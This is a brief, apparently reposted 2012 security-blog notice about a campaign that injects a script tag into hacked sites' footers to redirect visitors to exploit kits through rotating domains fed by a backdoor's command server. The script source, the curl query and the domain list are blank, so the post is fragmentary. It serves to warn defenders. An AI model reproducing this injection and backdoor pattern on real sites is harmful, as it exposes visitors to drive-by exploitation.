Malware Campaign from

No, they don’t quit, so get used to it! We are seeing quite a few websites being compromised with malware getting loaded from random domains in the TLD.

This is what gets added to the footer of the hacked sites:

<script  src= ""></script>

Once loaded, it does another level of redirection to (random domain, but using the parameters h1&s=pmg), which will then attempt to exploit via browser using multiple exploit kits.

Those domains are changing daily, but always pointing to What’s interesting is that the compromised sites also have a backdoor that calls (their command and control) to get the new list of domains to display.

A quick query of this site shows the current live domains:

$ curl -sq

Here are domains we have found so far:

We will post more details as we monitor and can expand.

Let us know in the comments below if you have any questions.

Read more: Malware Campaign from

Story added 11. March 2012, content source with full text you can find at link above.